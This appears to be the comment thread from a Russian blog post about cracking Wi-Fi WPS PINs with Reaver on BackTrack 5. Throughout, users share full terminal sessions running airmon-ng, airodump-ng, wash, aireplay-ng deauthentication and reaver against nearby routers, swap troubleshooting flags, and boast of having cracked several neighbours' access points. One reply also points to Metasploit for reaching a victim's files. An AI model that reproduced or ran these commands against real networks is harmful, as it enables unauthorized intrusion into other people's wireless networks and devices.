F8:D1:11:43:CC:A0 -82 249 23 0 8 54e. WPA2 CCMP PSK TP-LINK_43CCA
00:13:1A:57:65:A0 -101 29 18 0 1 11e. OPN
1C:7E:E5:FF:90:72 -101 62 0 0 11 54e WEP WEP DIR-300NRU
D8:5D:4C:D2:E3:C8 -100 21 0 0 11 54 . WPA2 CCMP PSK Internet
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 30:38:55:C4:31:3A -93 0 - 1 0 5 00:02:CF:CF:41:01 00:19:D2:23:5E:D3 -84 54 - 1 0 82 KMB F8:D1:11:43:CC:A0 00:1C:BF:3B:7E:70 -97 54e- 1e 0 20
root@bt:~# aireplay-ng -0 1 -a 00:02:CF:CF:41:01 -c 00:19:D2:23:5E:D3 mon0
16:15:41 Waiting for beacon frame (BSSID: 00:02:CF:CF:41:01) on channel 12
16:15:51 No such BSSID available.
Please specify an ESSID (-e).
root@bt:~# aireplay-ng -0 1 -a 00:02:CF:CF:41:01 -c 00:19:D2:23:5E:D3 -e mon0
No replay interface specified.
"aireplay-ng --help" for help.
root@bt:~#
aireplay-ng -0 1 -a 00:02:CF:CF:41:01 -c 00:19:D2:23:5E:D3 mon0 – это не в эту тему. эта статья про reaver и wps.
спасибо за помощь…
Статья потрясающая, огромное спасибо!
Zdravstvuite.
Posle togo kak dopisyvaiu (-no-nacks) v komandu:
root@bt:~# revear -i mon0 -b bsssidxxx -c 1 -vv –no-nacks
Poiavliaetsia takoe:
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011,Tactical Netwark Solutions,Craig Heffner
Chto ia ne tak delaiu.
Spasibo
слишком мало информации даете. покажите команды и их вывод.
что означает [!] WARNING: Failed to associate with 00;25;86;c7;79 (ESSID:Vpubud_2)
Это значит не удалось подключиться к АР. Старайтесь переводить сообщения, которые выводятся – их не так уж и сложно перевести.
Ночи доброй!Почему не ловятся дата пакеты?
Доброй, ну и как мне на вопрос отвечать? не знаю)
Подробнее.
root@bt:~# iwconfig
lo no wireless extensions.
wlan0 IEEE 802.11bg ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
eth0 no wireless extensions.
root@bt:~# airmon-ng
Interface Chipset Driver
wlan0 RTL8180/RTL8185 rtl8180 – [phy0]
root@bt:~# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
2339 dhclient3
2341 dhclient3
Process with PID 2339 (dhclient3) is running on interface wlan0
Interface Chipset Driver
wlan0 RTL8180/RTL8185 rtl8180 – [phy0]
(monitor mode enabled on mon0)
root@bt:~# airodump-ng mon0
CH 6 ][ Elapsed: 6 mins ][ 2012-05-25 10:32
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:16:E3:F4:C0:B8 0 1020 0 0 11 54 WPA2 TKIP PSK ZXDSL
84:C9:B2:57:5D:A5 0 893 0 0 5 54e. WPA2 CCMP PSK ASUS
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 00:14:D1:4B:D0:31 0 0 - 1 0 11
Вот посмотри буть так добр!День добрый!
Здравствуйте. Уже стал отчаиваться. Купил адаптер TP-Link TL-WN7200ND, специально для BackTrack и сопутствующих программ(чипсет Ralink RT3070). Перебор WPS не начинает ни в какую! wash начинает только при команде Wash -i mon0 -C иначе лезут ошибки. Скидываю лог всех своих действий. Да, reaver устанавливаю вручную из папки, причем встроенный в ноутбук адаптер(Broadcom) работает на ура…
root@bt:~# apt-get install reaver
Reading package lists… Done
Building dependency tree
Reading state information… Done
reaver is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
root@bt:~# iw reg set BO
root@bt:~# iwconfig wlan1 txpower 27
root@bt:~# airmon-ng start wlan1
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
2687 dhclient3
2750 dhclient3
Process with PID 2750 (dhclient3) is running on interface wlan0
Interface Chipset Driver
wlan1 Ralink RT2870/3070 rt2800usb – [phy1]
(monitor mode enabled on mon0)
wlan0 Broadcom b43 – [phy0]
root@bt:~# airodump-ng mon0
CH 9 ][ Elapsed: 8 s ][ 2012-05-25 18:56
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
84:C9:B2:AB:2C:2A -48 5 0 0 6 54e WPA2 CCMP PSK Veram
00:1B:11:32:61:88 -60 5 0 0 6 54 WPA TKIP PSK k-233
FC:75:16:D7:F7:ED -66 5 0 0 6 54e WPA2 CCMP PSK Utel
1C:7E:E5:D2:8B:14 -101 9 34 7 1 54e WPA CCMP PSK DIR-3
BSSID STATION PWR Rate Lost Frames Probe
1C:7E:E5:D2:8B:14 1C:62:B8:17:58:25 -127 0e- 0 0 35
root@bt:~# wash -i mon0
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
root@bt:~# wash -i mon0 -C
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
BSSID Channel RSSI WPS Version WPS Locked ESSID
—————————————————————————————————————
FC:75:16:D7:F7:ED 6 -67 1.0 No Uxxx
root@bt:~# reaver -i mon0 -b FC:75:16:D7:F7:ED -vv -c 6
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 6
[+] Waiting for beacon from FC:75:16:D7:F7:ED
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[+] Nothing done, nothing to save.
root@bt:~# reaver -i mon0 -b FC:75:16:D7:F7:ED -vv -c 6 -n
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 6
[+] Waiting for beacon from FC:75:16:D7:F7:ED
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
[+] Nothing done, nothing to save.
Некоторые шаги повторно выполнил, чтобы показать откуда начинаются проблемы. :roll:
Handshake рубит на ура! По уровню сигнала всё хорошо, встроенная карта в пять раз слабее, но общается с точкой без затруднений :neutral:
Очень прошу, помогите решить проблему! :cry:
поробуйте так – # reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 6 -e network_name -vv -A
Всё сделал, как Вы и сказали. И даже больше, не желает работать, может быть дело в драйвере, вшитом в BackTrack5 R2? Еще был замечен странный факт, несколько раз после остановки Reaver перебор вероломно продолжается и никак не останавливается :cry:
CH 5 ][ Elapsed: 1 min ][ 2012-05-26 06:48 ][ Decloak: FC:75:16:D7:F7:ED
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
84:C9:B2:AB:2C:2A -50 79 0 0 6 54e WPA2 CCMP PSK Veram
00:1B:11:32:61:88 -63 65 0 0 6 54 WPA TKIP PSK k-233
FC:75:16:D7:F7:ED -66 67 36 0 6 54e WPA2 CCMP PSK Utel
1C:7E:E5:D2:8B:14 -67 84 0 0 1 54e WPA CCMP PSK DIR-3
BSSID STATION PWR Rate Lost Frames Probe
FC:75:16:D7:F7:ED 90:F6:52:0D:7E:0A 0 1 - 1 0 699
root@bt:~# reaver -i mon0 -b FC:75:16:D7:F7:ED -c 6 -vv -e Utel -vv -A
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 6
[+] Waiting for beacon from FC:75:16:D7:F7:ED
[+] Associated with FC:75:16:D7:F7:ED (ESSID: Utel)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
И так далее. На всех WPS! :cry:
Посмотрите, что для вас написал komrad7
Хотел спросить. Вы часто замечаете, что обязательным условием является хороший сигнал от AP. Насколько хороший? 70db, 60db, а может быть и все 30db? А то все эти полоски – вещь весьма относительная.
В радио-сетях уровень сигнала играет ОЧЕНЬ важную роль! Это один из обязательных параметров, на которые стоит смотреть (обращать внимание). Взлом, на мой взгляд, можно осуществлять при уровне сигнала от 65%.
А нельзя ли в дицебелах. Мне в этих процентах, видит Бог, проблематично ориентироваться. 65% – это 35 db, правильно я понимаю?
Хотел спросить. Может быть не совсем в тему. Извеняюсь. Не собираетесь ли Вы сделать пост по уязвимости Hole 196. Очень интересует. А то информация повсеместно самая поверхностная.
Если будет время. А так в ближайшее время будет много статей по взлому.
Taler.
У меня такой же адаптер,тоже были проблеммы с reaver,проблемма как я понял в драйвере ,попробуйте вот этот диск http://www.wifislax.com/category/download/nuevas-versiones/ в кляксе(minidwep-gtk) всё замечательно работает.Сломал 5 точек даже с низким сигналом
komrad7, а есть какая–то возможность раскачать на работу этот адаптер в reaver, начинал ломать сети какраз со slax, правда версии старой, но потом по оределенным причинам прешел на reaver, лично для меня эти причины очень весомы. Иначе весь смысл этого адаптера для меня пропадает…((( На форуме есть умельцы, способные подправить драйвер???
Taler.
Я перепробовал почти все диски и бактрак и беини,xiaopan но именно реавер для нашего адаптера работает в wifislax только в кляксе(minidwep-gtk),в других прогах в инфляторе или чисто реавере он не ассоциируется с точкой,конкретно объяснить почему немогу.В кляксе -запускаете программу (кликаете “Кляксу” – ОК – клик “Encrypt WPA” – scan
-выбираете сетку с “хвостиком” _wps -> click “Reaver” ,или пробовать ставить патченные драйвера в бактрак
Добрый вечер. Было упоминание аренды сервера амазон. Как это организовать и какова цена вопроса?
http://aws.amazon.com/ec2/pricing/
p.s.: еще раз укажите порно сайт в форме, будите игнорироваться администрацией.
доброго времени суток! вопрос.. имея подключение и ключи к моему вай фай этот человек может посмотреть информацию хранящююся на моем жеском диске? как он может это сделать ?
заранее благодарен.
Да, но для начала этому человеку нужно будет получить доспуп к компьютеру: metasploit, SET & etc.
http://www.levinkv.ru/category/bezopasnost/
Здравствуйте, у меня есть ноут (кор5 и тд), загружаю чел вирт бокс и так пробовал, смысл когда дохожу до “IWconfig” мне показывавает
lo – no wireless extensions что то такое и eth0 Тоже самое более ничего не пишет. В чем проблемка и можно ли ее как то решить?
Здравствуйте. Не надо заниматься взломом wifi из под виртуальной машины. Могут быть проблемы с драйверами, как скорее всего у вас.
Загрузите ВТ5 на USB.
Здравствуйте, по какой причине не запускается airmon -ng? command not found. установлен bt5r2
Здравствуйте, такого быть не может, чтобы airmon-ng не было в ВТ5R2. Может быть все таки BT5R1?
еще вопросик… ввожу стандартные команды
iwconfig
airmon-ng start wlan0
airodump-ng mon0
reaver -i mon0 -b ххххххххх -vv идет поиск до 15% а потом то что ниже … и так постоянно без изменений.
в чем причина ? как это лечится ? спасибо.
WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×02), re-trying last pin
[+] Trying pin 17115674
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
^C
Респект создателю спасибо за труды и ответы.Я чайник и без комментариев не смог бы разобраться,а самому задавать глупые вопросы стремно. Для таких как я все показанные команды в специальном окне(терминале) в программе чтобы до этого дойти надо скачать ВТ5R2, создать диск записать его на флешку(очень простая программа (Li..Li..) или dvd потом при включении комп. нажимаем F2 переходим в биос и там ставим загрузку с флешки или DVD и дальше по статье у меня сутки ушло разобраться но если б я понимал что делать без скачки на всё 10 минут,буквенный пароль за 6 часов взломал.
airmon-ng не запускается, по тому что он пишется, как я написал, а не airmon -ng , т.е. без пробела!
Приветствую! А на Висту можно установить Reaver?
Здравствуйте. Забудьте об этом! Ставьте BackTrack5R2
Здравствуйте,
у меня такой вопрос. Работаю с Backtrack BT R2. Пробовал вчера подобрать пароль к 3 разным сетям, Wep, WPA, WPA-2. Дохожу поэтапно до строчки кaк у вас в скриншоте: reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv, когда Reaver по идее должен начинать подбор пароля, но после этого пишет мне вот что:
Warning: Failed to associate with 2D:34:63:53:TU:52 (ESSID FIG)
или вобще пусто, то есть не пишет ничего
или старается начать подбор по пину, но пин при этом выписывает один и тот же (!), беспрерывно повторяя эту попытку с одним и тем же пином.
Tо есть такое ощущение, что Reaver виснет на этом рубеже.
[+] Waiting for beacon from 2D:34:63:53:TU:52
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 10
[+] Switching mon0 to channel 11
[+] Associated with 2D:34:63:53:TU:52 (ESSID:FIG)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0?02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0?02), re-trying last pin
[+] Trying pin 12345670
Mac-adress фильтры каким нибудь образом могут помешать подбору Reaver?om пароля в данном случае? Mеня бы это удивило, поскольку я ВСЕГДА меняю Mac-адрес на тот, чью сеть я проверяю на прочность, то есть дублирую его.
Вопрос:
Существует ли программа, позволяющая определять наличцие активной клиентской точки, то есть которая покажет мне, сидит ли человек сейчас в сети или нет и если да, то как мне ее вызвать из под BackTrack? И делать что если у человека есть W-lan сеть но он ей не пользуется, а скачивает все через провод-LAN?
А то так можно еще 1000 лет прождать и если никто не пользуется W-lan?ом, то и трафика нет. А наличие активной клиентской точки и трафика обязательно, без этого взлом невозможeн!
Надеюсь на скорый ответ.
С уважением
Сергей
Сигнал где то от -50 до -65
Не пойму,куда вопрос мой делся,ну ладно… Так,на висту можно райвер поставить или нет? Спасибо.
Извиняюсь,инет глючил! :sad: Скачал,загнал на DVD,а теперь значит зря? :cry: Уж очень хотелось поэксперементировать! :smile:
И да, после того, как я ввожу wash -i mon0 или
wash -i mon0 –scan
пишет
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
[!] Found packet with bad FCS, skipping…
Как это понимать?
Попробуйте так: walsh -i mon0 –ignore-fcs
Сергею:
На Висту можешь даже не пытаться, замучаешся исправлять ошибки в компиляции, если он вобще на нее встанет.
Приветствую! Т.е. данный софт только под LINUX?
Можно установить и под Windows, но так делают только … В общем работай с Linux.
Вы меня извините,Hub-lex! Просто я пока что не силён во всей этой науке. У меня есть ноут с вистой и я искал программу для взлома WPA. Хотелось бы просто узнать,можно ли воспользоваться этой прогой с тем,что имею под рукой? И если можно,то как это сделать абсолютому пока что неучу? :-)Перелопатив инет,наткнулся на Ваш блог. Вы очень просто и доходчиво обьясняете.Очень редко встретишь на просторах сети человека терпеливого и умеющего толково и грамотно подать материал.Вы из таких,за что Вам огромная благодарность.
Большое спасибо! Рад, что блог вам интересен.
Повторюсь еще раз, не надо ничего делать из под Windows. Только Linux (BackTrack). Поэтому для начала скачайте BT5 (http://www.backtrack-linux.org/downloads/) и загрузите его на флешку (http://www.backtrack-linux.org/tutorials/usb-live-install/).
По Linux для начала можете прочитать статьи – http://www.levinkv.ru/category/linux/
А так, в скором времени появятся on-line курсы по Linux уровня LPIC1. Так что не пропустите, если интересно =)
Учиться, учиться и учиться, как завещал великий Л… Было бы время, желание, да трезвая голова…
Кому нужно, тот всего добьется.
Кто будет жить лишь мечтами о том, что было бы не плохо знать/уметь то или иное – жалок, и не нет ему оправдания…
Уважаемый Hub-lex
вы, так и не ответили на мой вопрос.
:sad:
Готово.
:-) Нас тут просто два Сергея! Я буду Серго и в 16.34 писал я!:-) Задам свой вопрос.Ubuntu Portable Remix подойдёт для установки на Windows Vista и будет ли работать BT5 на этой виртуальной машине? Спасибо!
Ну по идеи должна, так как Ubuntu Portable Remix предназначен для запуска linux приложений в windows. Однако этим не занимался, так как есть BackTrack.
Уважаемый Hub-lex
вы так и не ответили на мой вопрос
3 Июнь 2012 в 16:30 и
3 Июнь 2012 в 19:29
:sad:
Здравствуйте,
проблему c WASH решил.
Вот как это должно выглядеть, тогда все работает:
wash -i mon0 –s -C
Здравствуйте,
проблему c WASH решил.
Вот как это должно выглядеть, тогда все работает:
wash -i mon0 -C -s
И еще, видел пишут, что в BackTrack R2 комадой netstat -nr на возможно определить активные клиентские точки, но это не так.
Приветствую! При запуске с DVD обрывается запуск ВТ2.Криво скачалось или что другое? Спасибо!
Не надо пользоваться live DVD. Скорость считывания гораздо ниже, чем у USB.
А по поводу “обрывается” ничего не могу сказать, мало данных.
Ещё один плюсик автору статьи. Всё написано достаточно доходчего. Действовал пошагово, согласно инструкции.Получилось всё с первого раза. Подбор ключа запороленной ТД производился при подключении к свободной ТД с качеством связи в 65% на ноуте с чипсетом адаптера Intel 1050. На подбор ключа (10 цифр) ушло 20 часов. Подписался на рассылку)) Спасибо и успехов в дальнейшем!
Спасибо)
И вам успехов! Дальше будет еще интереснее.
А у меня такой вопрос:
Во время сканировании выключаем точку жертвы.
Выходим, сессия сохраняется.
Включаем точку снова, загружаем сессию.
А имеет смысл в этом случае продолжать, или нужно начинать сначала (у точки будет тот-же PIN при старте?)
Если сессия сохранилась и вы ее запустили снова. Тогда будет продолжаться, с того места, где остановились.
Добрый день!
Подскажите пожалуйста.
Я скачал BT5R1 по Вашей ссылке. Записал на DVD RW. Запускаю его, но машина не загружается.
Т.е. я понимаю должен произойти автозапуск, а у меня открываеться как папка с файлами.Может надо установить прогу для автозапуска???? Посоветуйте.
Заранее спасибо.
Ни каких DVD! Только так – http://www.backtrack-linux.org/tutorials/usb-live-install/
Сергею.
Надо через BIOS приоритетом для загрузки системы указать не Ваш жёсткий диск,а привод CD\DVD.Должно всё пойти.BT5 запускается как самостоятельная операционка.
Добрый день,
нужна помощь в работе с Reaver 1.4 под Backtrack 5 R2, срочно!
Перебор пинкода доходит до 99,99 % и глохнет
Простоял сутки, набрал 99,99 % и встал на 99.99% с pin 24315998
Пробовал вот так:
reaver -i mon0 -b хх.хх.хх.хх.хх.хх -c 6 –pin 24315998 –vv
получаю
[+] Waiting for beacon from 00.00.00.00.55.00
[+] Switching mon0 to channel 5
[+] Associated with 00.00.00.00.55.00(ESSID: ongbak)
[+] Trying pin 24315998
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 24315998
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×02), re-trying last pin
[+] Trying pin 24315998
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 24315998
Пробовал:
reaver -i mon0 -c 6 -b 00.00.00.00.55.00 -w –N -S -1 300 после восстановления сессии.
После этого начинает подбирать пин начиная с 92, 54 % и на выходе вот что:
смотри *
но уже БЕЗ WARNING: Receive timeout occured
Также пробовал так:
-i mon0 -b 00.00.00.00.55.00 -c 6 –d 30 –vv
Подскажите пожалуйста можно ли как нибудь добить pin до 100% ?
Первые 4 цифры правильние, осталось набрать последние 4.
Есть ли еще какие нибудь префиксы помимо -p –p -S -d -w -N -L ?
Или нужно перебирать заново, указав при том первую часть пина, что бы подобрал вторую часть?
Подскажите пожалуйста как это можно сделать?
p.s.: Как узнать какой рутер не знаю, так как рутер не близко, по сигналу -70/-71.
Узнал только модель производителя по мэк адресу здесь: http://www.coffer.com/mac_find/
Cisco Systems
*
92,50 % comlete@2012-06-10 13:23:12(5 seconds/pin)
92,50 % comlete@2012-06-10 13:33:46(5 seconds/pin)
92,50 % comlete@2012-06-10 13:42:32(5 seconds/pin)
92,53 % comlete@2012-06-10 13:46:28(5 seconds/pin)
92,54 % comlete@2012-06-10 13:48:05(5 seconds/pin)
92,54 % comlete@2012-06-10 13:55:18(5 seconds/pin)
92,55 % comlete@2012-06-10 13:56:23(6 seconds/pin)
92,56 % comlete@2012-06-10 13:56:37(6 seconds/pin)
92,56 % comlete@2012-06-10 13:57:22(6 seconds/pin)
92,57 % comlete@2012-06-10 13:58:41(6 seconds/pin)
92,58 % comlete@2012-06-10 13:59:03(6 seconds/pin)
92,78 % comlete@2012-06-10 14:03:09(6 seconds/pin)
93,12 % comlete@2012-06-10 14:14:14(7 seconds/pin)
93,24 % comlete@2012-06-10 14:18:25(7 seconds/pin)
93,37 % comlete@2012-06-10 14:23:54(7 seconds/pin)
93,40 % comlete@2012-06-10 14:28:17(7 seconds/pin)
93,40 % comlete@2012-06-10 14:33:48(7 seconds/pin)
93,49 % comlete@2012-06-10 14:42:33(7 seconds/pin)
93,53 % comlete@2012-06-10 14:51:56(7 seconds/pin)
93,58 % comlete@2012-06-10 14:55:34(7 seconds/pin)
93,61 % comlete@2012-06-10 14:58:22(7 seconds/pin)
93,64 % comlete@2012-06-10 15:03:12(8 seconds/pin)
93,67 % comlete@2012-06-10 15:12:15(8 seconds/pin)
Спасибо большое, Серго!
Все понял. Получилось.
Только опять столкнулся с другой проблемой.
Не выполняется команда apt-get update и соответственно не могу установить Reaver. Как мне кажется это из-за того что в BackTrack нужно настроить беспроводное соединение. Подскажите как. Я пробовал – ВТ ее не видит. Хотя это мой собственный Вай-Фай, которым я пользуюсь 2 годаю Следовательно дело не в железе. Подскажите как активитровать Вай-Фай через ВТ??? Заранее большое спасибо!!!
Здесь обсуждение идет эксплойта reaver, а не того “как активировать Вай-Фай через BT”.
Вы не правы,уважаемый User.Далеко не все здесь уверенные пользователи LINUX.Для того и форум,что бы разобрать проблему и дать или получить хороший совет.
Вообще то вы просто комментарии оставляете. Никакого форума нет.
Коль стало так много комментариев, может быть действительно сделать форум или группу?
Было бы просто здорово!
User назвал это обсуждением,я соответственно,форумом.:-)Действительно,уважаемый Hub-lex,создайте уже форум!Видите,сколько у Вас последователей!:-)
Ммм…ладно буду думать на эту тему. Что то создать по-любому придется.
скачайте BackTrack 5 R2, в котором reaver уже установлен.и будет вам счастье…
Сергей,Вы главное не спешите.:-) Для ВТ5R2 инет,действительно не нужен.Дали команду,покурите,попейте чайку или там ещё чего!:-)Видимо с DVD BT5 R2 работает медленно и долго думает.Я сам случайно это заметил,когда перенервничав пошёл покурить.Вернулся,глядь… Заработало! И правильно набирайте команды.Сам психовал,нервничал,присмотрелся… Лишнюю букву написал!:-)Вообщем,терпения Вам,тёзка!
To Алексей.
Так и я пользуюсь ВТ5R2
так и начинайте работать с реавером,он уже установлен и не надо ничего устанавливать
Ситуашка такая-сделал пошагово-вроде всё вери гуд.Выдал пароль за 9 сек.Но подключиться к вай-фай не получается.Попробую к другой точке.Плевать,слабая или нет.Хоть посмотрю-пины и пароли разные выдаёт,или как.С уважением.
Думаю, что Reaver v 1.3 по совместимости лучше с BackTrack 5 R2/BackTrack 5 R1. Reaver 1.4 на многих картах плохо работает в BackTrack?e. По крайней мере я уже не раз сталкивался с отзывами, что при таких сочетаниях:
* один и тот же компьютер
* одна и та же карта
* BackTrack 5 R2/BackTrackR1 + Reaver 1.3
1.3 не ошибается и не “виснет” на тех этапах, где 1.4 выдает ошибки или стопорится.
Это можно отнести к таким же парадоскам, как и то, что в официальном списке чипсетов используемых для работы с Reaver, Netgear Wg 111 v 3 находится в списке неподдерживаемых. На самом же деле она пашет, при этом не смотря на маленькую мощность сигнала, но это как известно не показатель, так как мощность хороша при прямых соединениях, а для вардрайвинга важна исключительно чувствительность приема и здесь на данный момент chip RTL8187L один из лучших.
p.s.: И кстати, есть еще Reaver Pro, не знаю насколько лучше модефицированный, но судя по отзывам он лучше подогнан под BackTrack 5 и почти не содержит багов, так, как подогнан Админом.
С чего Ты взял, что у Netgear Wg 111 v. 3 чип – RTL8187L. Не RTL8187L а RTL8187B (www.wikidevi.com – загнляни на досуге).” а для вардрайвинга важна исключительно чувствительность приема и здесь на данный момент chip RTL8187L один из лучших”. Лучшего по определению не существует. Предпочтительнее всего конечно же выглядит Prism 2/2.5/3. Но карту на нем купить только на ebay.com, можно. Зачем лишний гемор. Удовлетворимся Рилтеком. Никто не говорит, что
